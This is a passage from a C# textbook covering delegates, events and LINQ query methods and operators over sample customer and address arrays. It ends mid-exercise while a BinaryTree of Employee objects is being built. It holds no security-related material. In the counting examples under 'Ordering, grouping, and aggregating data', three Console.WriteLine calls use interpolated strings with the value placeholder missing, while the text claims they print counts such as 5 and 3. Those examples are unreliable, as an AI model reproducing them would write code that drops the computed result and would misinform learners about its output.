5. Locate the AuditOrder method. This is the method that is run by using
the delegate in the CheckoutController object. It invokes another private
method called doAuditing to actually perform the audit operation. The
method looks like this:
public void AuditOrder(Order order)
{
this.doAuditing(order);
}
6. Scroll down to the doAuditing method. The code in this method is
enclosed in a try/catch block; it uses the XML APIs of the .NET
Framework class library to generate an XML representation of the order
being audited and saves it to a file. (The exact details of how this works
are beyond the scope of this chapter.)
After the catch block, add a finally block that raises the
AuditProcessingComplete event, as shown in the following in bold:
private async void doAuditing(Order order)
{
List<OrderItem> ageRestrictedItems =
findAgeRestrictedItems(order);
if (ageRestrictedItems.Count > 0)
{
try
{
...
}
catch (Exception ex)
{
...
}
finally
{
if (this.AuditProcessingComplete != null)
{
this.AuditProcessingComplete($"Audit record written for Order {order.OrderID}");
}
}
}
}
7. In the DeliveryService project, open the Shipper.cs file in the Code and
Text Editor window.
8. Add a public delegate called ShippingCompleteDelegate to the Shipper
class. This delegate should specify a method that takes a string
parameter called message and that returns a void. The code in bold in the
following example shows the definition of this delegate:
public class Shipper
{
public delegate void ShippingCompleteDelegate(string
message);
...
}
9. Add a public event called ShipProcessingComplete to the Shipper class,
based on the ShippingCompleteDelegate delegate as shown in bold in
the following code:
public class Shipper
{
public delegate void ShippingCompleteDelegate(string
message);
public event ShippingCompleteDelegate
ShipProcessingComplete;
...
}
10. Find the doShipping method, which is the method that performs the
shipping logic. In the method, after the catch block, add a finally block
that raises the ShipProcessingComplete event, as shown here in bold:
private async void doShipping(Order order)
{
try
{
...
}
catch (Exception ex)
{
...
}
finally
{
if (this.ShipProcessingComplete != null)
{
this.ShipProcessingComplete($"Dispatch note generated for Order {order.OrderID}");
}
}
}
11. In the Delegates project, display the layout for the MainPage.xaml file in
the Design View window. In the XAML pane, scroll down to the first
set of RowDefinition items. The XAML code looks like this:
<Grid Background="{StaticResource
ApplicationPageBackgroundThemeBrush}">
<Grid Margin="12,0,12,0" Loaded="MainPageLoaded">
<Grid.RowDefinitions>
<RowDefinition Height="*"/>
<RowDefinition Height="2*"/>
<RowDefinition Height="*"/>
<RowDefinition Height="10*"/>
<RowDefinition Height="*"/>
</Grid.RowDefinitions>
...
12. Change the Height property of the final RowDefinition item to 2* as
shown in bold in the following code:
<Grid.RowDefinitions>
...
<RowDefinition Height="10*"/>
<RowDefinition Height="2*"/>
</Grid.RowDefinitions>
This change in the layout makes available a bit of space at the bottom of
the form. You will use this space as an area for displaying the messages
received from the Auditor and Shipper components when they raise their
events. Chapter 25, “Implementing the user interface for a Universal
Windows Platform app,” provides more detail on laying out user
interfaces by using a Grid control.
13. Scroll to the bottom of the XAML pane. Add the following ScrollViewer
and TextBlock elements shown in bold before the penultimate </Grid>
tag:
...
</Grid>
<ScrollViewer Grid.Row="4"
VerticalScrollBarVisibility="Visible">
<TextBlock x:Name="messageBar" FontSize="18" />
</ScrollViewer>
</Grid>
</Grid>
</Page>
This markup adds a TextBlock control called messageBar to the area at
the bottom of the screen. You will use this control to display messages
from the Auditor and Shipper objects. Again, you will learn more about
grid layouts in Chapter 25.
14. Display the MainPage.xaml.cs file in the Code and Text Editor window.
Find the CheckoutButtonClicked method and remove the code that
displays the summary of the order. The try block should look like this
after you have deleted the code:
private void CheckoutButtonClicked(object sender,
RoutedEventArgs e)
{
try
{
// Perform the checkout processing
this.checkoutController.StartCheckoutProcessing(this.order);
// Clear out the order details so the user can start
again with a new order
this.order = new Order
{
Date = DateTime.Now,
Items = new List<OrderItem>(),
OrderID = Guid.NewGuid(),
TotalValue = 0
};
this.orderDetails.DataContext = null;
this.orderValue.Text = $"{order.TotalValue:C}";
this.listViewHeader.Visibility = Visibility.Collapsed;
this.checkout.IsEnabled = false;
}
catch (Exception ex)
{
...
}
}
15. Add a private method called displayMessage to the MainPage class.
This method should take a string parameter called message and should
return a void. In the body of this method, add a statement that appends
the value in the message parameter to the Text property of the
messageBar TextBlock control, followed by a newline character, as
shown here in bold:
private void displayMessage(string message)
{
this.messageBar.Text += $"{message}{Environment.NewLine}";
}
This code causes the message to appear in the message area at the
bottom of the form.
16. Find the constructor for the MainPage class and add the code shown
here in bold:
public MainPage()
{
...
this.auditor = new Auditor();
this.shipper = new Shipper();
this.checkoutController = new CheckoutController();
this.checkoutController.CheckoutProcessing +=
this.auditor.AuditOrder;
this.checkoutController.CheckoutProcessing +=
this.shipper.ShipOrder;
this.auditor.AuditProcessingComplete += this.displayMessage;
this.shipper.ShipProcessingComplete += this.displayMessage;
}
These statements subscribe to the events exposed by the Auditor and
Shipper objects. When the events are raised, the displayMessage method
runs. Notice that the same method handles both events.
17. On the Debug menu, click Start Debugging to build and run the
application.
18. When the Wide World Importers form appears, select some items
(include at least one age-restricted item), and then click Checkout.
19. Verify that the “Audit record written” message appears in the TextBlock
at the bottom of the form, followed by the “Dispatch note generated”
message:
20. Place further orders and note the new messages that appear each time
you click Checkout (you might need to scroll down to see them when
the message area fills up).
21. When you have finished, return to Visual Studio 2017 and stop
debugging.
Summary
In this chapter, you learned how to use delegates to reference methods and
invoke those methods. You also saw how to define lambda expressions that
can be run by using a delegate. Finally, you learned how to define and use
events to trigger execution of a method.
If you want to continue to the next chapter, keep Visual Studio 2017
running and turn to Chapter 21.
If you want to exit Visual Studio 2017 now, on the File menu, click
Exit. If you see a Save dialog box, click Yes and save the project.
Quick reference
To declare a delegate type
Write the keyword delegate, followed by the return type, followed by the name of the delegate type, followed by any parameter types. For example:
delegate void myDelegate();
To create an instance of a delegate initialized with a single specific method
Use the same syntax you use for a class or structure: write the keyword new, followed by the name of the type (the name of the delegate), followed by the argument between parentheses. The argument must be a method whose signature exactly matches the signature of the delegate. For example:
delegate void myDelegate();
private void myMethod() { ... }
...
myDelegate del = new myDelegate(this.myMethod);
Invoke a delegate
Use the same syntax as a method call. For example:
myDelegate del;
...
del();
Declare an event
Write the keyword event, followed by the name of the type
(the type must be a delegate type), followed by the name of
the event. For example:
class MyClass
{
    public delegate void MyDelegate();
    ...
    public event MyDelegate MyEvent;
}
Subscribe to an event
Create a delegate instance (of the same type as the event),
and attach the delegate instance to the event by using the +=
operator. For example:
class MyEventHandlingClass
{
    private MyClass myClass = new MyClass();
    ...
    public void Start()
    {
        myClass.MyEvent +=
            new MyClass.MyDelegate(this.eventHandlingMethod);
    }

    private void eventHandlingMethod()
    {
        ...
    }
}
You can also get the compiler to generate the new delegate
automatically simply by specifying the subscribing method:
public void Start()
{
myClass.MyEvent +=
this.eventHandlingMethod;
}
Unsubscribe from an event
Create a delegate instance (of the same type as the event),
and detach the delegate instance from the event by using the
–= operator. For example:
class MyEventHandlingClass
{
    private MyClass myClass = new MyClass();
    ...
    public void Stop()
    {
        myClass.MyEvent -=
            new MyClass.MyDelegate(this.eventHandlingMethod);
    }
    ...
}
Or:
public void Stop()
{
myClass.MyEvent -=
this.eventHandlingMethod;
}
Raise an event
Use the same syntax as a method call. You must supply
arguments to match the type of the parameters expected by
the delegate referenced by the event. Don’t forget to check
whether the event is null. For example:
class MyClass
{
    public event MyDelegate MyEvent;
    ...
    private void RaiseEvent()
    {
        if (this.MyEvent != null)
        {
            this.MyEvent();
        }
    }
    ...
}
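In C# 6 and later, you can combine the null check and the invocation by using the null-conditional operator. This sketch is equivalent to the RaiseEvent method shown above:

private void RaiseEvent()
{
    this.MyEvent?.Invoke();
}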
CHAPTER 21
Querying in-memory data by using query expressions
After completing this chapter, you will be able to:
Define Language-Integrated Query (LINQ) queries to examine the
contents of enumerable collections.
Use LINQ extension methods and query operators.
Explain how LINQ defers evaluation of a query and how you can force
immediate execution and cache the results of a LINQ query.
You have now met most of the features of the C# language. However, so
far I have glossed over one important aspect of the language that is likely to
be used by many applications: the support that C# provides for querying data.
You have seen that you can define structures and classes for modeling data
and that you can use collections and arrays for temporarily storing data in
memory. However, how do you perform common tasks such as searching for
items in a collection that match a specific set of criteria? For example, if you
have a collection of Customer objects, how do you find all customers that are
located in London, or how can you find out which town has the most
customers who have procured your services? You can write your own code to
iterate through a collection and examine the fields in each object, but these
types of tasks occur so often that the designers of C# decided to include
features in the language to minimize the amount of code you need to write. In
this chapter, you will learn how to use these advanced C# language features
to query and manipulate data.
What is LINQ?
All but the most trivial of applications need to process data. Historically,
most applications provided their own logic for performing these operations.
However, this strategy can lead to the code in an application becoming very
tightly coupled with the structure of the data that it processes. If the data
structures change, you might need to make a significant number of changes to
the code that handles the data. The designers of the Microsoft .NET
Framework thought long and hard about these issues and decided to make the
life of an application developer easier by providing features that abstract the
mechanism that an application uses to query data from application code itself.
These features are called Language-Integrated Query, or LINQ.
The creators of LINQ took an unabashed look at the way in which
relational database management systems such as Microsoft SQL Server
separate the language used to query a database from the internal format of the
data in the database. Developers accessing a SQL Server database issue
Structured Query Language (SQL) statements to the database management
system. SQL provides a high-level description of the data that the developer
wants to retrieve but does not indicate exactly how the database management
system should retrieve this data. These details are controlled by the database
management system itself. Consequently, an application that invokes SQL
statements does not care how the database management system physically
stores or retrieves data. The format used by the database management system
can change (for example, if a new version is released) without the application
developer needing to modify the SQL statements used by the application.
LINQ provides syntax and semantics very reminiscent of SQL and with
many of the same advantages. You can change the underlying structure of the
data being queried without needing to change the code that actually performs
the queries. You should be aware that although LINQ looks similar to SQL, it
is far more flexible and can handle a wider variety of logical data structures.
For example, LINQ can handle data organized hierarchically, such as that
found in an XML document. However, this chapter concentrates on using
LINQ in a relational manner.
Using LINQ in a C# application
Perhaps the easiest way to explain how to use the C# features that support
LINQ is to work through some simple examples based on the following sets
of customer and address information:
CUSTOMER INFORMATION

CustomerID  FirstName  LastName     CompanyName
1           Kim        Abercrombie  Alpine Ski House
2           Jeff       Hay          Coho Winery
3           Charlie    Herb         Alpine Ski House
4           Chris      Preston      Trey Research
5           Dave       Barnett      Wingtip Toys
6           Ann        Beebe        Coho Winery
7           John       Kane         Wingtip Toys
8           David      Simpson      Trey Research
9           Greg       Chapman      Wingtip Toys
10          Tim        Litton       Wide World Importers

ADDRESS INFORMATION

CompanyName           City           Country
Alpine Ski House      Berne          Switzerland
Coho Winery           San Francisco  United States
Trey Research         New York       United States
Wingtip Toys          London         United Kingdom
Wide World Importers  Tetbury        United Kingdom
LINQ requires the data to be stored in a data structure that implements the
IEnumerable or IEnumerable<T> interface, as described in Chapter 19,
”Enumerating collections.” It does not matter what structure you use (an
array, a HashSet<T>, a Queue<T>, or any of the other collection types, or
even one that you define yourself) as long as it is enumerable. However, to
keep things straightforward, the examples in this chapter assume that the
customer and address information is held in the customers and addresses
arrays shown in the following code example.
Note In a real-world application, you would populate these arrays by
reading the data from a file or a database.
var customers = new[] {
    new { CustomerID = 1, FirstName = "Kim", LastName = "Abercrombie",
          CompanyName = "Alpine Ski House" },
    new { CustomerID = 2, FirstName = "Jeff", LastName = "Hay",
          CompanyName = "Coho Winery" },
    new { CustomerID = 3, FirstName = "Charlie", LastName = "Herb",
          CompanyName = "Alpine Ski House" },
    new { CustomerID = 4, FirstName = "Chris", LastName = "Preston",
          CompanyName = "Trey Research" },
    new { CustomerID = 5, FirstName = "Dave", LastName = "Barnett",
          CompanyName = "Wingtip Toys" },
    new { CustomerID = 6, FirstName = "Ann", LastName = "Beebe",
          CompanyName = "Coho Winery" },
    new { CustomerID = 7, FirstName = "John", LastName = "Kane",
          CompanyName = "Wingtip Toys" },
    new { CustomerID = 8, FirstName = "David", LastName = "Simpson",
          CompanyName = "Trey Research" },
    new { CustomerID = 9, FirstName = "Greg", LastName = "Chapman",
          CompanyName = "Wingtip Toys" },
    new { CustomerID = 10, FirstName = "Tim", LastName = "Litton",
          CompanyName = "Wide World Importers" }
};

var addresses = new[] {
    new { CompanyName = "Alpine Ski House", City = "Berne",
          Country = "Switzerland" },
    new { CompanyName = "Coho Winery", City = "San Francisco",
          Country = "United States" },
    new { CompanyName = "Trey Research", City = "New York",
          Country = "United States" },
    new { CompanyName = "Wingtip Toys", City = "London",
          Country = "United Kingdom" },
    new { CompanyName = "Wide World Importers", City = "Tetbury",
          Country = "United Kingdom" }
};
Note The sections “Selecting data,” “Filtering data,” “Ordering,
grouping, and aggregating data,” and “Joining data” that follow show
you the basic capabilities and syntax for querying data by using LINQ
methods. The syntax can become a little complex at times, and you will
see when you reach the section “Using query operators” that it is not
actually necessary to remember how all the syntax works. However, it
is useful for you to at least take a look at these sections so that you can
fully appreciate how the query operators provided with C# perform their
tasks.
Selecting data
Note The code for the examples shown in this section is available in the
LINQSamples solution, located in the \Microsoft Press\VCSBS\Chapter
21\LINQSamples folder in your Documents folder.
Suppose that you want to display a list consisting of the first name of each
customer in the customers array. You can achieve this task with the following
code:
IEnumerable<string> customerFirstNames =
customers.Select(cust => cust.FirstName);
foreach (string name in customerFirstNames)
{
Console.WriteLine(name);
}
Although this block of code is quite short, it does a lot, and it requires a
degree of explanation, starting with the use of the Select method of the
customers array.
Using the Select method, you can retrieve specific data from the array—in
this case, just the value in the FirstName field of each item in the array. How
does it work? The parameter to the Select method is actually another method
that takes a row from the customers array and returns the selected data from
that row. You can define your own custom method to perform this task, but
the simplest mechanism is to use a lambda expression to define an
anonymous method, as shown in the preceding example. There are three
important things that you need to understand at this point:
The variable cust is the parameter passed into the method. You can
think of cust as an alias for each row in the customers array. The
compiler deduces this from the fact that you are calling the Select
method on the customers array. You can use any legal C# identifier in
place of cust.
The Select method does not actually retrieve the data at this time; it
simply returns an enumerable object that will fetch the data identified
by the Select method when you iterate over it later. We will return to
this aspect of LINQ in the section ”LINQ and deferred evaluation”
later in this chapter.
The Select method is not actually a method of the Array type. It is an
extension method of the Enumerable class. The Enumerable class is
located in the System.Linq namespace and provides a substantial set of
static methods for querying objects that implement the generic
IEnumerable<T> interface.
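In fact, because Select is an extension method, the expression customers.Select(...) is simply a convenient syntax for calling the static Select method of the Enumerable class. The following statement, which you would rarely write in practice, is equivalent to the earlier example and makes this relationship explicit:

IEnumerable<string> customerFirstNames =
    System.Linq.Enumerable.Select(customers, cust => cust.FirstName);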
The preceding example uses the Select method of the customers array to
generate an IEnumerable<string> object named customerFirstNames. (It is
of type IEnumerable<string> because the Select method returns an
enumerable collection of customer first names, which are strings.) The
foreach statement iterates through this collection of strings, printing out the
first name of each customer in the following sequence:
Kim
Jeff
Charlie
Chris
Dave
Ann
John
David
Greg
Tim
You can now display the first name of each customer. How do you fetch
the first and last name of each customer? This task is slightly trickier. If you
examine the definition of the Enumerable.Select method in the System.Linq
namespace in the documentation supplied with Microsoft Visual Studio 2017,
you will see that it looks like this:
public static IEnumerable<TResult> Select<TSource, TResult> (
this IEnumerable<TSource> source,
Func<TSource, TResult> selector
)
What this actually says is that Select is a generic method that takes two
type parameters named TSource and TResult as well as two ordinary
parameters named source and selector. TSource is the type of the collection
for which you are generating an enumerable set of results (customer objects
in this example), and TResult is the type of the data in the enumerable set of
results (string objects in this example). Remember that Select is an extension
method, so the source parameter is actually a reference to the type being
extended (a generic collection of customer objects that implements the
IEnumerable interface in the example). The selector parameter specifies a
generic method that identifies the fields to be retrieved. (Remember that Func
is the name of a generic delegate type in the .NET Framework that you can
use for encapsulating a generic method that returns a result.) The method
referred to by the selector parameter takes a TSource (in this case, customer)
parameter and yields a TResult (in this case, string) object. The value
returned by the Select method is an enumerable collection of TResult (again
string) objects.
Note Chapter 12, ”Working with inheritance,” explains how extension
methods work and the role of the first parameter to an extension
method.
The important point to understand from the preceding paragraph is that the
Select method returns an enumerable collection based on a single type. If you
want the enumerator to return multiple items of data, such as the first and last
name of each customer, you have at least two options:
You can concatenate the first and last names together into a single
string in the Select method, like this:
IEnumerable<string> customerNames =
    customers.Select(cust => $"{cust.FirstName} {cust.LastName}");
You can define a new type that wraps the first and last names and use
the Select method to construct instances of this type, like this:
class FullName
{
public string FirstName{ get; set; }
public string LastName{ get; set; }
}
...
IEnumerable<FullName> customerFullNames =
customers.Select(cust => new FullName
{
FirstName = cust.FirstName,
LastName = cust.LastName
});
The second option is arguably preferable, but if this is the only use
that your application makes of the FullName type, you might prefer to use
an anonymous type, as in the following, instead of defining a new type
specifically for a single operation:
var customerFullNames =
customers.Select(cust => new
{
FirstName = cust.FirstName,
LastName = cust.LastName
});
Notice the use of the var keyword here to define the type of the
enumerable collection. The type of objects in the collection is anonymous, so
you do not know the specific type of the objects in the collection.
Filtering data
With the Select method, you can specify, or project, the fields that you want
to include in the enumerable collection. However, you might also want to
restrict the rows that the enumerable collection contains. For example,
suppose you want to list only the names of companies in the addresses array
that are located in the United States. To do this, you can use the Where
method, as follows:
IEnumerable<string> usCompanies = addresses
.Where(addr => String.Equals(addr.Country,"United States"))
.Select(usComp => usComp.CompanyName);
foreach (string name in usCompanies)
{
Console.WriteLine(name);
}
Syntactically, the Where method is similar to Select. It expects a
parameter that defines a method that filters the data according to whatever
criteria you specify. This example makes use of another lambda expression.
The variable addr is an alias for a row in the addresses array, and the lambda
expression returns all rows where the Country field matches the string
“United States”. The Where method returns an enumerable collection of rows
containing every field from the original collection. The Select method is then
applied to these rows to project only the CompanyName field from this
enumerable collection to return another enumerable collection of string
objects. (The variable usComp is an alias for the type of each row in the
enumerable collection returned by the Where method.) The type of the result
of this complete expression is, therefore, IEnumerable<string>. It is
important to understand this sequence of operations—the Where method is
applied first to filter the rows, followed by the Select method to specify the
fields. The foreach statement that iterates through this collection displays the
following companies:
Coho Winery
Trey Research
Ordering, grouping, and aggregating data
If you are familiar with SQL, you are aware that it makes it possible for you
to perform a wide variety of relational operations besides simple projection
and filtering. For example, you can specify that you want data to be returned
in a specific order, you can group the rows returned according to one or more
key fields, and you can calculate summary values based on the rows in each
group. LINQ provides the same functionality.
To retrieve data in a particular order, you can use the OrderBy method.
Like the Select and Where methods, OrderBy expects a method as its
argument. This method identifies the expressions that you want to use to sort
the data. For example, you can display the name of each company in the
addresses array in ascending order, like this:
IEnumerable<string> companyNames = addresses
.OrderBy(addr => addr.CompanyName)
.Select(comp => comp.CompanyName);
foreach (string name in companyNames)
{
Console.WriteLine(name);
}
This block of code displays the companies in the addresses table in
alphabetical order.
Alpine Ski House
Coho Winery
Trey Research
Wide World Importers
Wingtip Toys
If you want to enumerate the data in descending order, you can use the
OrderByDescending method instead. If you want to order by more than one
key value, you can use the ThenBy or ThenByDescending method after
OrderBy or OrderByDescending.
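For example, the following sketch (the variable name is purely illustrative) orders the companies in the addresses array first by country and then by company name within each country:

var orderedCompanies = addresses
    .OrderBy(addr => addr.Country)
    .ThenBy(addr => addr.CompanyName)
    .Select(comp => comp.CompanyName);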
To group data according to common values in one or more fields, you can
use the GroupBy method. The following example shows how to group the
companies in the addresses array by country:
var companiesGroupedByCountry = addresses
.GroupBy(addrs => addrs.Country);
foreach (var companiesPerCountry in companiesGroupedByCountry)
{
Console.WriteLine(
    $"Country: {companiesPerCountry.Key}\t{companiesPerCountry.Count()} companies");
foreach (var companies in companiesPerCountry)
{
Console.WriteLine($"\t{companies.CompanyName}");
}
}
By now, you should recognize the pattern. The GroupBy method expects a
method that specifies the fields by which to group the data. However, there
are some subtle differences between the GroupBy method and the other
methods that you have seen so far.
The main point of interest is that you don’t need to use the Select method
to project the fields to the result. The enumerable set returned by GroupBy
contains all the fields in the original source collection, but the rows are
ordered into a set of enumerable collections based on the field identified by
the method specified by GroupBy. In other words, the result of the GroupBy
method is an enumerable set of groups, each of which is an enumerable set of
rows. In the example just shown, the enumerable set
companiesGroupedByCountry is a set of countries. The items in this set are
themselves enumerable collections containing the companies for each country
in turn. The code that displays the companies in each country uses a foreach
loop to iterate through the companiesGroupedByCountry set to yield and
display each country in turn, and then it uses a nested foreach loop to iterate
through the set of companies in each country. Notice in the outer foreach
loop that you can access the value you are grouping by using the Key field of
each item, and you can also calculate summary data for each group by using
methods such as Count, Max, Min, and many others. The output generated by
the example code looks like this:
Country: Switzerland 1 companies
Alpine Ski House
Country: United States 2 companies
Coho Winery
Trey Research
Country: United Kingdom 2 companies
Wingtip Toys
Wide World Importers
You can use many of the summary methods such as Count, Max, and Min
directly over the results of the Select method. If you want to know how many
companies there are in the addresses array, you can use a block of code such
as this:
int numberOfCompanies = addresses
.Select(addr => addr.CompanyName).Count();
Console.WriteLine($"Number of companies: ");
Notice that the result of these methods is a single scalar value rather than
an enumerable collection. The output from the preceding block of code looks
like this:
Number of companies: 5
I should utter a word of caution at this point. These summary methods do
not distinguish between rows in the underlying set that contain duplicate
values in the fields you are projecting. This means that strictly speaking, the
preceding example shows you only how many rows in the addresses array
contain a value in the CompanyName field. If you wanted to find out how
many different countries are mentioned in this table, you might be tempted to
try this:
int numberOfCountries = addresses
.Select(addr => addr.Country).Count();
Console.WriteLine($"Number of countries: ");
The output looks like this:
Number of countries: 5
In fact, the addresses array includes only three different countries; it just
so happens that United States and United Kingdom both occur twice. You
can eliminate duplicates from the calculation by using the Distinct method,
like this:
int numberOfDistinctCountries = addresses
.Select(addr => addr.Country).Distinct().Count();
Console.WriteLine($"Number of distinct countries: ");
The Console.WriteLine statement now outputs the expected result:
Number of distinct countries: 3
Joining data
Just like SQL, LINQ gives you the ability to join together multiple sets of
data over one or more common key fields. The following example shows
how to display the first and last names of each customer, together with the
name of the country where the customer is located:
var companiesAndCustomers = customers
    .Select(c => new { c.FirstName, c.LastName, c.CompanyName })
    .Join(addresses,
          custs => custs.CompanyName,
          addrs => addrs.CompanyName,
          (custs, addrs) => new { custs.FirstName, custs.LastName, addrs.Country });
foreach (var row in companiesAndCustomers)
{
Console.WriteLine(row);
}
The customers’ first and last names are available in the customers array,
but the country for each company that customers work for is stored in the
addresses array. The common key between the customers array and the
addresses array is the company name. The Select method specifies the fields
of interest in the customers array (FirstName and LastName), together with
the field containing the common key (CompanyName). You use the Join
method to join the data identified by the Select method with another
enumerable collection. The parameters to the Join method are as follows:
The enumerable collection with which to join
A method that identifies the common key fields from the data
identified by the Select method
A method that identifies the common key fields on which to join the
selected data
A method that specifies the columns you require in the enumerable
result set returned by the Join method
In this example, the Join method joins the enumerable collection
containing the FirstName, LastName, and CompanyName fields from the
customers array with the rows in the addresses array. The two sets of data are
joined where the value in the CompanyName field in the customers array
matches the value in the CompanyName field in the addresses array. The
result set includes rows containing the FirstName and LastName fields from
the customers array with the Country field from the addresses array. The
code that outputs the data from the companiesAndCustomers collection
displays the following information:
{ FirstName = Kim, LastName = Abercrombie, Country = Switzerland }
{ FirstName = Jeff, LastName = Hay, Country = United States }
{ FirstName = Charlie, LastName = Herb, Country = Switzerland }
{ FirstName = Chris, LastName = Preston, Country = United States }
{ FirstName = Dave, LastName = Barnett, Country = United Kingdom }
{ FirstName = Ann, LastName = Beebe, Country = United States }
{ FirstName = John, LastName = Kane, Country = United Kingdom }
{ FirstName = David, LastName = Simpson, Country = United States }
{ FirstName = Greg, LastName = Chapman, Country = United Kingdom }
{ FirstName = Tim, LastName = Litton, Country = United Kingdom }
Note Remember that collections in memory are not the same as tables
in a relational database, and the data they contain is not subject to the
same data integrity constraints. In a relational database, it could be
acceptable to assume that every customer has a corresponding company
and that each company has its own unique address. Collections do not
enforce the same level of data integrity, meaning that you can quite
easily have a customer referencing a company that does not exist in the
addresses array, and you might even have the same company occurring
more than once in the addresses array. In these situations, the results
that you obtain might be accurate but unexpected. Join operations work
best when you fully understand the relationships between the data you
are joining.
Using query operators
The preceding sections have shown you many of the features available for
querying in-memory data by using the extension methods for the Enumerable
class defined in the System.Linq namespace. The syntax makes use of several
advanced C# language features, and the resultant code can sometimes be
quite hard to understand and maintain. To relieve you of some of this burden,
the designers of C# added query operators to the language with which you
can employ LINQ features by using a syntax more akin to SQL.
As you saw in the examples shown earlier in this chapter, you can retrieve
the first name for each customer like this:
IEnumerable<string> customerFirstNames = customers
.Select(cust => cust.FirstName);
You can rephrase this statement by using the from and select query
operators, like this:
var customerFirstNames = from cust in customers
select cust.FirstName;
At compile time, the C# compiler resolves this expression into the
corresponding Select method. The from operator defines an alias for the
source collection, and the select operator specifies the fields to retrieve by
using this alias. The result is an enumerable collection of customer first
names. If you are familiar with SQL, notice that the from operator occurs
before the select operator.
Continuing in the same vein, to retrieve the first and last names for each
customer, you can use the following statement. (You might want to refer to
the earlier example of the same statement based on the Select extension
method.)
var customerNames = from cust in customers
select new { cust.FirstName, cust.LastName };
You use the where operator to filter data. The following example shows
how to return the names of the companies based in the United States from the
addresses array:
var usCompanies = from a in addresses
where String.Equals(a.Country,"United States")
select a.CompanyName;
To order data, use the orderby operator, like this:
var companyNames = from a in addresses
orderby a.CompanyName
select a.CompanyName;
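To reverse the sort order, append the descending keyword (ascending is the default), like this:

var companyNames = from a in addresses
                   orderby a.CompanyName descending
                   select a.CompanyName;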
You can group data by using the group operator in the following manner:
var companiesGroupedByCountry = from a in addresses
group a by a.Country;
Notice that, as with the earlier example showing how to group data, you
do not provide the select operator, and you can iterate through the results by
using the same code as the earlier example, like this:
foreach (var companiesPerCountry in companiesGroupedByCountry)
{
Console.WriteLine(
    $"Country: {companiesPerCountry.Key}\t{companiesPerCountry.Count()} companies");
foreach (var companies in companiesPerCountry)
{
Console.WriteLine($"\t{companies.CompanyName}");
}
}
You can invoke summary functions such as Count over the collection
returned by an enumerable collection like this:
int numberOfCompanies = (from a in addresses
select a.CompanyName).Count();
Notice that you wrap the expression in parentheses. If you want to ignore
duplicate values, use the Distinct method:
int numberOfCountries = (from a in addresses
select a.Country).Distinct().Count();
Tip In many cases, you probably want to count just the number of rows
in a collection rather than the number of values in a field across all the
rows in the collection. In this case, you can invoke the Count method
directly over the original collection, like this:
int numberOfCompanies = addresses.Count();
You can use the join operator to combine two collections across a
common key. The following example shows the query returning customers
and addresses over the CompanyName column in each collection, this time
rephrased by using the join operator. You use the on clause with the equals
operator to specify how the two collections are related.
Note LINQ currently supports equi-joins (joins based on equality) only.
If you are a database developer who is used to SQL, you might be
familiar with joins based on other operators, such as > and <, but LINQ
does not provide these features.
var countriesAndCustomers = from a in addresses
                            join c in customers
                            on a.CompanyName equals c.CompanyName
                            select new { c.FirstName, c.LastName, a.Country };
Note In contrast with SQL, the order of the expressions in the on clause
of a LINQ expression is important. You must place the item you are
joining from (referencing the data in the collection in the from clause) to
the left of the equals operator and the item you are joining with
(referencing the data in the collection in the join clause) to the right.
LINQ provides a large number of other methods for summarizing
information and joining, grouping, and searching through data. This section
has covered just the most common features. For example, LINQ provides the
Intersect and Union methods, which you can use to perform set-wide
operations. It also provides methods such as Any and All that you can use to
determine whether at least one item in a collection or every item in a
collection matches a specified predicate. You can partition the values in an
enumerable collection by using the Take and Skip methods. For more
information, see the material in the LINQ section of the documentation
provided with Visual Studio 2017.
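As a brief illustration, the following sketches apply some of these methods to the addresses array shown earlier:

// Any: is at least one company located in Switzerland?
bool anySwiss = addresses.Any(addr => String.Equals(addr.Country, "Switzerland"));

// All: are all of the companies located in the United Kingdom?
bool allUK = addresses.All(addr => String.Equals(addr.Country, "United Kingdom"));

// Take and Skip: partition the collection into the first two rows and the remainder
var firstTwo = addresses.Take(2);
var theRest = addresses.Skip(2);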
Querying data in Tree<TItem> objects
The examples you’ve seen so far in this chapter have shown how to query the
data in an array. You can use the same techniques for any collection class that
implements the generic IEnumerable<T> interface. In the following exercise,
you will define a new class for modeling employees for a company. You will
create a BinaryTree object containing a collection of Employee objects, and
then you will use LINQ to query this information. You will initially call the
LINQ extension methods directly, but then you will modify your code to use
query operators.
Retrieve data from a BinaryTree by using the extension methods
1. Start Visual Studio 2017 if it is not already running.
2. Open the QueryBinaryTree solution, which is located in the \Microsoft
Press\VCSBS\Chapter 21\QueryBinaryTree folder in your Documents
folder. The project contains the Program.cs file, which defines the
Program class with the Main and doWork methods that you have seen in
previous exercises.
The solution also includes a copy of the BinaryTree project that you
have seen in previous chapters.
3. In Solution Explorer, right-click the QueryBinaryTree project, point to
Add, and then click Class. In the Add New Item - QueryBinaryTree
dialog box, type Employee.cs in the Name box, and then click Add.
4. Add the automatic properties shown in bold in the following code to the
Employee class:
class Employee
{
public string FirstName { get; set; }
public string LastName { get; set; }
public string Department { get; set; }
public int Id { get; set; }
}
5. Add the ToString method shown in bold in the code that follows to the
Employee class. Types in the .NET Framework use this method when
converting the object to a string representation, such as when displaying
it by using the Console.WriteLine statement.
class Employee
{
...
    public override string ToString() =>
        $"Id: {this.Id}, Name: {this.FirstName} {this.LastName}, Dept: {this.Department}";
}
6. Modify the definition of the Employee class to implement the
IComparable<Employee> interface, as shown here:
class Employee : IComparable<Employee>
{
    ...
}
This step is necessary because the BinaryTree class specifies that its
elements must be “comparable.”
7. Hover over the IComparable<Employee> interface in the class
definition, click the lightbulb icon that appears, and then click
Implement Interface Explicitly on the context menu.
This action generates a default implementation of the CompareTo
method. Remember that the BinaryTree class calls this method when it
needs to compare elements when inserting them into the tree.
8. Replace the body of the CompareTo method with the following code
shown in bold. This implementation of the CompareTo method
compares Employee objects based on the value of the Id field.
int IComparable<Employee>.CompareTo(Employee other)
{
if (other == null)
{
return 1;
}
if (this.Id > other.Id)
{
return 1;
}
if (this.Id < other.Id)
{
return -1;
}
return 0;
}
Note For a description of the IComparable<T> interface, refer to
Chapter 19.
9. In Solution Explorer, right-click the QueryBinaryTree project, point to
Add, and then click Reference. In the Reference Manager -
QueryBinaryTree dialog box, in the left pane, click Solution. In the
middle pane, select the BinaryTree project, and then click OK.
10. Display the Program.cs file for the QueryBinaryTree project in the Code
and Text Editor window, and verify that the list of using directives at the
top of the file includes the following line of code (it should be greyed
out as you have not yet written any code that uses types in this
namespace):
using System.Linq;
11. Add the following using directive to the list at the top of the Program.cs
file to bring the BinaryTree namespace into scope:
using BinaryTree;
12. In the doWork method in the Program class, remove the // TODO:
comment and add the following statements shown in bold to construct
and populate an instance of the BinaryTree class:
static void doWork()
{
    Tree<Employee> empTree = new Tree<Employee>(
        new Employee { Id = 1, FirstName = "Kim", LastName = "Abercrombie",
                       Department = "IT" });
    empTree.Insert(
